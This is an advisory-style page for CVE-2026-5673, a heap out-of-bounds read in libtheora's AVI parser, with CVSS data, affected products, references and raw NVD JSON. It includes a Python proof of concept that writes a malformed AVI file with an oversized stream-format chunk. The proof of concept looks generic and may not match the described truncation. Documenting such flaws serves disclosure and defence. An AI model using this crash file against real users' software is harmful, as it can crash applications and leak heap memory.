Security Vulnerability Report
CVE-2026-5673 CVSS 5.6 MEDIUM

Published: 2026-04-06 10:16:03
Last Modified: 2026-05-01 19:53:03

Description

A flaw was found in libtheora. This heap-based out-of-bounds read vulnerability exists within the AVI (Audio Video Interleave) parser, specifically in the avi_parse_input_file() function. A local attacker could exploit this by tricking a user into opening a specially crafted AVI file containing a truncated header sub-chunk. This could lead to a denial-of-service (application crash) or potentially leak sensitive information from the heap.

CVSS Details

CVSS Score: 5.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:xiph:theora:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:* - VULNERABLE
libtheora (for the specific affected versions, refer to the official security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct

# PoC for CVE-2026-5673
# Description: Generates a malformed AVI file with a truncated header sub-chunk
# to trigger the heap-based out-of-bounds read in libtheora.


def generate_malformed_avi(filename):
    with open(filename, 'wb') as f:
        # RIFF header
        f.write(b'RIFF')
        f.write(struct.pack('<I', 0))  # File size (placeholder)
        f.write(b'AVI ')

        # LIST header for hdrl
        f.write(b'LIST')
        f.write(struct.pack('<I', 0))  # List size
        f.write(b'hdrl')

        # avih header (Main AVI Header)
        f.write(b'avih')
        f.write(struct.pack('<I', 56))  # Header size
        # Standard dummy data for avih (56 bytes)
        f.write(b'\x00' * 56)

        # LIST header for strl (Stream list)
        f.write(b'LIST')
        f.write(struct.pack('<I', 0))  # List size
        f.write(b'strl')

        # strh header (Stream header)
        f.write(b'strh')
        f.write(struct.pack('<I', 56))  # Header size
        # Standard dummy data for strh (56 bytes)
        f.write(b'\x00' * 56)

        # Trigger: A malformed strf (Stream format) chunk with truncated size
        # The vulnerability is triggered by a truncated header sub-chunk.
        # We set a chunk ID 'strf' but an unexpectedly small or invalid size.
        f.write(b'strf')
        # Writing a large size value to simulate truncation/bad calculation
        f.write(struct.pack('<I', 0xFFFFFFF0))
        # Fill with dummy data to ensure the file is parsed but triggers the read
        f.write(b'A' * 100)


if __name__ == "__main__":
    generate_malformed_avi('cve_2026_5673_poc.avi')
    print("PoC file generated: cve_2026_5673_poc.avi")

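References

https://access.redhat.com/security/cve/CVE-2026-5673
https://bugzilla.redhat.com/show_bug.cgi?id=2455340
https://github.com/xiph/theora/issues/24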

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5673", "sourceIdentifier": "[email protected]", "published": "2026-04-06T10:16:03.400", "lastModified": "2026-05-01T19:53:02.907", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libtheora. This heap-based out-of-bounds read vulnerability exists within the AVI (Audio Video Interleave) parser, specifically in the avi_parse_input_file() function. A local attacker could exploit this by tricking a user into opening a specially crafted AVI file containing a truncated header sub-chunk. This could lead to a denial-of-service (application crash) or potentially leak sensitive information from the heap."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xiph:theora:-:*:*:*:*:*:*:*", "matchCriteriaId": "BE5CC1A3-2780-4ECB-AD3F-A76714A6BABD"}, {"vulnerable": true, 
"criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-5673", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455340", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/xiph/theora/issues/24", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}